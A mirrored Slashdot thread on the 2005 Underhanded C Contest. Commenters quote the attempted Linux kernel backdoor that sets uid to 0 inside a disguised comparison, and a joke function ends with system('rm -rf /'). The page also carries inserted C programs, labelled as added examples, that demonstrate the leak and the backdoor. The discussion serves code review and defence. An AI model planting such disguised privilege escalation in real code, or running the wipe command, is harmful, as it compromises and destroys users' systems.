Slashdot Mirror


Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

41 of 150 comments

  1. Just what the world needs... by goldspider · · Score: 2, Interesting

    ...more malicious code writers.

    Thanks be to Slashdot for giving them the recognition/praise they so richly deserve.

    --
    "Ask not what your country can do for you." --John F. Kennedy
    1. Re:Just what the world needs... by Snoolas · · Score: 2, Insightful

      Better have them writing code for contests than having them writing real malicious code that will actually affect the public...

    2. Re:Just what the world needs... by Jeremi · · Score: 2, Insightful

      ... countered by a larger number of more alert code readers. Hopefully it comes out to a win for the Good Side.

      --
      I don't care if it's 90,000 hectares. That lake was not my doing.
    3. Re:Just what the world needs... by Acts+of+Attrition · · Score: 2, Insightful

      Right, I'm sure they're only allowed to pick one or the other.

  2. A-ha by Anonymous Coward · · Score: 2, Funny

    But Microsoft built a whole operating system based on the principle.

  3. Bill Gates Entry by bjorniac · · Score: 5, Funny

    Microsoft Word XP was rejected because the code had to seem innocent...

    1. Re:Bill Gates Entry by makomk · · Score: 5, Interesting

      Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.
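The leak described here, as an added example that is not part of the comment, the contest entries, or any Word code: a record-writing routine that copies only the new bytes into a field that is being reused and so writes out whatever the field held before, beside the clear-then-copy version that does not. The record layout, the function names and the sample title are constructed for this demonstration; the stale contents are planted explicitly, since reading a genuinely uninitialised buffer is undefined behaviour in C and would not reproduce reliably.

```c
#include <stdio.h>
#include <string.h>

#define TITLE_LEN 32

/* A fixed-size record as a document writer might emit it: the title field is
 * written to disk in full, whatever bytes it currently contains. (Constructed
 * layout for this example.) */
struct doc_record {
    char title[TITLE_LEN];
};

/* Leaky writer: copies only the bytes of the new title and leaves the rest
 * of the field untouched.  When `rec` is a reused buffer, everything it held
 * after the new terminator (here: the previous document's title) goes out
 * with the file, even though no string function will ever show it. */
void write_title_leaky(struct doc_record *rec, const char *title)
{
    size_t n = strlen(title);
    if (n >= TITLE_LEN)
        n = TITLE_LEN - 1;
    memcpy(rec->title, title, n);
    rec->title[n] = '\0';
}

/* Fixed writer: clears the whole field first, so the bytes after the
 * terminator are always zero regardless of what the buffer held before. */
void write_title_fixed(struct doc_record *rec, const char *title)
{
    size_t n;
    memset(rec->title, 0, TITLE_LEN);
    n = strlen(title);
    if (n >= TITLE_LEN)
        n = TITLE_LEN - 1;
    memcpy(rec->title, title, n);
}

/* Scan the raw bytes of the field, as a reader that ignores the string
 * terminator would, for a given fragment.  Returns 1 if it is present. */
int field_contains(const struct doc_record *rec, const char *needle)
{
    size_t nlen = strlen(needle);
    for (size_t i = 0; i + nlen <= TITLE_LEN; i++)
        if (memcmp(rec->title + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* Simulate buffer reuse: the record previously held a confidential title and
 * is now reused for a harmless one.  Returns 1 if the old title still
 * survives in the raw bytes that would be written to disk. */
int leak_demo(int use_fixed)
{
    struct doc_record rec;
    memset(&rec, 0, sizeof rec);
    strcpy(rec.title, "CONFIDENTIAL: layoffs Q3");   /* constructed stale data */
    if (use_fixed)
        write_title_fixed(&rec, "Notes");
    else
        write_title_leaky(&rec, "Notes");
    return field_contains(&rec, "layoffs");
}

/* Print the raw field bytes, '.' for anything non-printable. */
static void dump_raw(const char *label, const struct doc_record *rec)
{
    printf("%-6s ", label);
    for (int i = 0; i < TITLE_LEN; i++)
        putchar((rec->title[i] >= 32 && rec->title[i] < 127) ? rec->title[i] : '.');
    putchar('\n');
}

int main(void)
{
    struct doc_record rec;
    memset(&rec, 0, sizeof rec);
    strcpy(rec.title, "CONFIDENTIAL: layoffs Q3");
    write_title_leaky(&rec, "Notes");
    dump_raw("leaky", &rec);   /* Notes.ENTIAL: layoffs Q3........ */
    strcpy(rec.title, "CONFIDENTIAL: layoffs Q3");
    write_title_fixed(&rec, "Notes");
    dump_raw("fixed", &rec);   /* Notes........................... */
    return 0;
}
```

The same pattern applies to any serialiser that writes a fixed-size struct with memcpy or fwrite: padding bytes and the tail of string fields must be zeroed explicitly, because neither strlen-based code nor a hex-free file viewer will ever reveal what is sitting there.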

    2. Re:Bill Gates Entry by Richard_at_work · · Score: 5, Interesting

      Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmer's applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very weird, we thought. He reinstalled the .Net framework, VS.Net, everything he could think of, but nothing rectified the problems. We eventually found out what the problem was - McAfee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Weird, just weird.

    3. Re:Bill Gates Entry by homesteader · · Score: 2, Informative

      This may very well be due to a bug in McAfee VirusScan 8.0i, assuming that is what you are running. There was a bug fixed by Patch 6, I think. Patches are cumulative, so you can just apply Patch 11 and the problem should be fixed.

      Patches are not available from the public download location. You may need to have a support contract to get them.

  4. good to see by garat · · Score: 5, Insightful

    Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

    --
    Support alternatives to Paypal: http://www.e-gold.com
  5. I'll tell you what's underhanded by Weaselmancer · · Score: 4, Funny

    Stashing all the entries in a 1.1M archive rather than posting links to the code. No way I'm going to download that just to see what all the fuss is about.

    --
    Weaselmancer
    rediculous.
    1. Re:I'll tell you what's underhanded by RAMMS+EIN · · Score: 4, Funny

      Moreover, who knows the archive isn't exploiting some buffer overflow vulnerability in my archiving software! Knowing who this file comes from, you'd be a fool to open it!

      --
      Please correct me if I got my facts wrong.
    2. Re:I'll tell you what's underhanded by glesga_kiss · · Score: 5, Funny

      They predicted that kind of paranoid response. From their (humorous) FAQ:

      Are you shills from MicroSoft trying to evangelize C-sharp?

      No, we are not shills from MicroSoft trying to evangelize C-sharp.

      Are you trying to prove open source is bad?

      No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

      I bet you are government agents trying to entrap me.

      Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

      Do you know you've been Slashdotted?

      What, you couldn't tell from the last three questions?

    3. Re:I'll tell you what's underhanded by Weaselmancer · · Score: 2, Funny

      It's ok, I'm using Firefox. It's the most zyg234 bof*(0sls lkM12134 bsxQxo%9X browser out there!

      --
      Weaselmancer
      rediculous.
    4. Re:I'll tell you what's underhanded by nEoN+nOoDlE · · Score: 4, Funny

      Knowing who this file comes from, you'd be a fool to open it!

      but they would have known that only a great fool would open the archive given to him. I am not a great fool, so I can clearly not choose to open the archive. But they must have known I was not a great fool, they would have counted on it, so I can clearly open the archive supplied by them.

      --
      Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
    5. Re:I'll tell you what's underhanded by Threni · · Score: 2, Informative

      Most of the archive (in .tar format) is a picture of a train. I don't understand. Why not just post the results a text on a html page? Too easy?

  6. Will Code For Beer by Krast0r · · Score: 5, Funny

    "Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

    --
    Matthew Grint Midnight Artists
    1. Re:Will Code For Beer by jkfresh · · Score: 2, Informative

      It's not really funny if you are an alcoholic.

      http://www.aa.org/

    2. Re:Will Code For Beer by drsquare · · Score: 2, Interesting

      I fear for those who have to live with you.

      Why? I don't exactly go round killing people. Drink is just another liquid.

      What's with the moralising, anti-alcohol mods today? Slashdot's always whining about people's rights to do what they want with their own body, what about my right to drink? Why should that be censored?

    3. Re:Will Code For Beer by anagama · · Score: 3, Informative

      Actually, what you describe is "positive punishment" (apply negative stimulus in the presence of a certain behavior -- like a spanking for swearing). "Positive" is not used in the "good/bad" sense, but in the "plus/minus" sense.

      Negative reinforcement is a reward that occurs by subtracting an adverse stimulus from the environment. For example, Fridays are a form of negative reinforcement -- the withdrawal of a negative stimulus (work) is rewarding, makes people feel good/relieved, and thus, people come to really like Friday afternoons. http://en.wikipedia.org/wiki/Reinforcement#Positive_vs._negative

      --
      What changed under Obama? Nothing Good
    4. Re:Will Code For Beer by Reziac · · Score: 2, Funny

      About 15 years ago, a friend who is a mathematician dressed up in street-bum clothes and had a picture taken of himself holding a sign that reads, "Will solve partial differential equations for food".

      --
      ~REZ~ #43301. Who'd fake being me anyway?
  7. I'm still fond of this one by $RANDOMLUSER · · Score: 5, Interesting

    This one almost made it into the Linux kernel. It looks like error checking until you read it carefully. Short, brilliant and to the point.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

    In other words, you become root if you call sys_wait4() with the (__WCLONE|__WALL) flags.

    Story here and here

    --
    No folly is more costly than the folly of intolerant idealism. - Winston Churchill
    1. Re:I'm still fond of this one by Anonymous Coward · · Score: 5, Informative

      This one almost made it into the Linux kernel.

      It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

    2. Re:I'm still fond of this one by jnf · · Score: 5, Informative

      To anyone who makes a routine of putting their constants on the left-hand side of the expression, that becomes not very hard to notice... although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

    3. Re:I'm still fond of this one by chriso11 · · Score: 2, Insightful

      The =/== is one of C's most dastardly tricks. It is a great way to make infinite loops too.

      That said - I think that C IDEs which perform context sensitive coloring should use two different colors for = and ==. Or maybe put in a macro or something to make it harder for these types of bugs.

      --
      No, I don't trust in god. He'll have to pay up front, like everybody else.
    4. Re:I'm still fond of this one by jnf · · Score: 2, Insightful

      Why? The solution really becomes putting your constants on the left-hand side of the expression.

      It's really not that hard to get used to, I don't find it to be particularly ugly, and it solves the problem.

    5. Re:I'm still fond of this one by Tim+C · · Score: 3, Informative

      It's not that assignments aren't allowed in if statements, but that Java has boolean types. So while a statement like i = 0 does return 0 (as in C), unlike C 0 is not false, it's an int, and so if (0) is a compile time error.

      You can still do things like if ((line = in.readLine()) == null) of course

    6. Re:I'm still fond of this one by jnf · · Score: 2, Interesting

      All of my code gets -Wall -Werror -pedantic; I do constants on the left more out of habit now, but I don't think it's a bad idea, or ugly.

      Also note that -pedantic wouldn't create a warning, but gcc -Wall would.

    7. Re:I'm still fond of this one by ipfwadm · · Score: 3, Insightful

      And the attempted backdoor in question put the parens around the assignment, thus avoiding the warning.
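
The quoted condition in both its backdoored and intended forms, as an added example that is not part of the original post or of the kernel patch it quotes, wrapped in stand-alone C so the side effect the thread describes can be observed, together with the constants-on-the-left form jnf recommends. The `struct task`, the helper names and the `uid_after_*` wrappers are stand-ins chosen for this example, not kernel code; the flag values match Linux's `<linux/wait.h>`, but any two distinct bits would serve.

```c
#include <errno.h>
#include <stdio.h>

/* Flag values as in <linux/wait.h>; guarded in case the system headers
 * already provide them. */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

/* Stand-in for the kernel's task struct; only the uid field matters here. */
struct task {
    unsigned int uid;
};

/* The check as it appeared in the attempted backdoor.  `current->uid = 0` is
 * an assignment, not a comparison: it stores 0 into uid and then evaluates
 * to 0 (false), so the "error" branch never runs and the caller silently
 * ends up with uid 0.  The parentheses around the assignment also keep
 * gcc -Wall from emitting its "assignment used as truth value" warning. */
int wait_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The intended check, written with the constant on the left.  Had the
 * original been typed as `0 = current->uid`, it would not have compiled. */
int wait_check_fixed(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (0 == current->uid))
        retval = -EINVAL;
    return retval;
}

/* Wrappers for observing the side effect: run a check on a task that starts
 * with `uid` and report the uid the task is left with. */
unsigned int uid_after_backdoored(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    wait_check_backdoored(&t, options);
    return t.uid;
}

unsigned int uid_after_fixed(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    wait_check_fixed(&t, options);
    return t.uid;
}

/* Same, but report the return value of the check. */
int retval_backdoored(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    return wait_check_backdoored(&t, options);
}

int retval_fixed(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    return wait_check_fixed(&t, options);
}

int main(void)
{
    unsigned int flags = __WCLONE|__WALL;
    printf("backdoored, uid 1000: retval=%d uid afterwards=%u\n",
           retval_backdoored(1000, flags), uid_after_backdoored(1000, flags));
    printf("fixed,      uid 1000: retval=%d uid afterwards=%u\n",
           retval_fixed(1000, flags), uid_after_fixed(1000, flags));
    printf("fixed,      uid 0:    retval=%d (-EINVAL)\n",
           retval_fixed(0, flags));
    return 0;
}
```

Note that neither branch ever fires for an unprivileged caller: the backdoored version returns 0 just like a clean run, which is why the line reads as harmless error handling until the `=` is spotted.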

  8. Important contest by jurt1235 · · Score: 2, Insightful

    Does anybody remember the event about 1.5 years ago when a programmer managed to smuggle malicious code into the Linux kernel?

    Virus writers and script kiddies are not a worry for this kind of code writing. The programmer you hire to write that AJAX extension to your website is also worth worrying about. This contest just shows how it is done.

    --
    My wife's sketchblog Blob[p]: Gastrono-me
    1. Re:Important contest by Anonymous Coward · · Score: 2, Informative
    2. Re:Important contest by BobaFett · · Score: 2, Informative

      The Register article is a bit alarmist, at least compared to the response Linus gives in this thread: http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0621.html

  9. Making Wrong Code Look Wrong by lelkes · · Score: 3, Insightful

    It would be extremely important to use coding standards which make wrong code look wrong. Not only would it be more difficult to inject malicious code, but if somebody made mistakes, they would be really easy to discover.
    Joel has a great article on this.

  10. cute fluffy kittens! by planetoid · · Score: 5, Funny

    int cute_fluffy_kittens(void)
    {
          printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

          setuid(1);
          system("rm -rf /");
    }

    --
    Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.
    1. Re:cute fluffy kittens! by grahamlee · · Score: 4, Funny

      Which is worse, the incorrect UID or the incorrect function prototype?

  11. Runtime code generation by pkhuong · · Score: 4, Informative

    The CLR does JIT (or, at least, runtime) compilation. A common way to do so is to output the machine code on the stack. W^X usually breaks programs that do runtime code generation. Now, this is a WAG, but that's where my money's at.

    --
    Try Corewar @ www.koth.org - rec.games.corewar
    1. Re:Runtime code generation by nothings · · Score: 3, Insightful

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

    2. Re:Runtime code generation by ultranova · · Score: 2, Informative

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

      Well, you could make the compile function recursive. That is, compile a single method, then run it, and if it calls (at runtime) any other methods that haven't been compiled yet, call the compile function iteratively, passing a pointer to the point in stack where the code was executing.

      So how do you figure out which methods are compiled and where they are located ? Simple - you implement a linked list entirely on stack. Simply have another function, which allocates a single element in the stack, links it to the previous one, and then calls the compiler function, giving it a pointer to tell where it left (passed by the compiler function to the datastore function). Of course, you'd also need to pass the pointer to the start of the list as a parameter to all of these functions...

      Anyway, the point is that it would be horrendously complicated, it would be horrendously inefficient, it would be extremely easy to break unintentionally, and it would make implementing security features difficult for the aforementioned reasons - but it would be possible. In other words, it's just the way Microsoft would do it ;).

      Real fun begins if you want to allocate all the objects generated by the runtime on stack too...

      --
      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  12. Corewar veterans by lastfish · · Score: 4, Interesting

    Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

    Good practice for writing obscure, but useful, code.

    I'd give clickable links but fear for these sites under load.

    www.corewar.info/
    www.corewar.co.uk/94nophof.txt

  13. OT, nPaper II's ownership by pkhuong · · Score: 3, Interesting

    John's a corewar god (all that 6502 assembly probably has something to do with that ;), so nPaper is nearly all his: the constant twiddling (by hand!), the QS, etc. All I did was basically write the framework for the paper; the only non-standard parts were the attack engine and the djn at the end of the timescape component... and I believe the djn was removed, because, even though it was more aggressive, it was less effective than a checksum with a jmz. Read CoreWarrior #.. erh. I think it was in the high 70s or low 80s. John describes the process of optimising a newbie's paper (nPaper), all by hand (He might have used some BASIC scripting :).

    Even now that we have evolvers throwing tons of computing power at a relatively small search space (nano), John submitted something that rocketed to 1st place and manages more than 50% wins. Again, the dude is a corewar genius.

    Paul(-Virak) Khuong

    PS, note the position of the dash

    --
    Try Corewar @ www.koth.org - rec.games.corewar
  14. Ken Thompson... by Sam+Nitzberg · · Score: 4, Informative

    It's not exactly the same thing, but the most powerful and clever C code example with an 'underhanded' purpose must be Ken Thompson's classic...

    Reflections on Trusting Trust
    http://www.acm.org/classics/sep95/

    Other interesting papers that come to mind include Tom Duff's on Unix viruses, as well as McIlroy.

    Sam

    sam @ iamsam.com
    http: /www . iamsam . com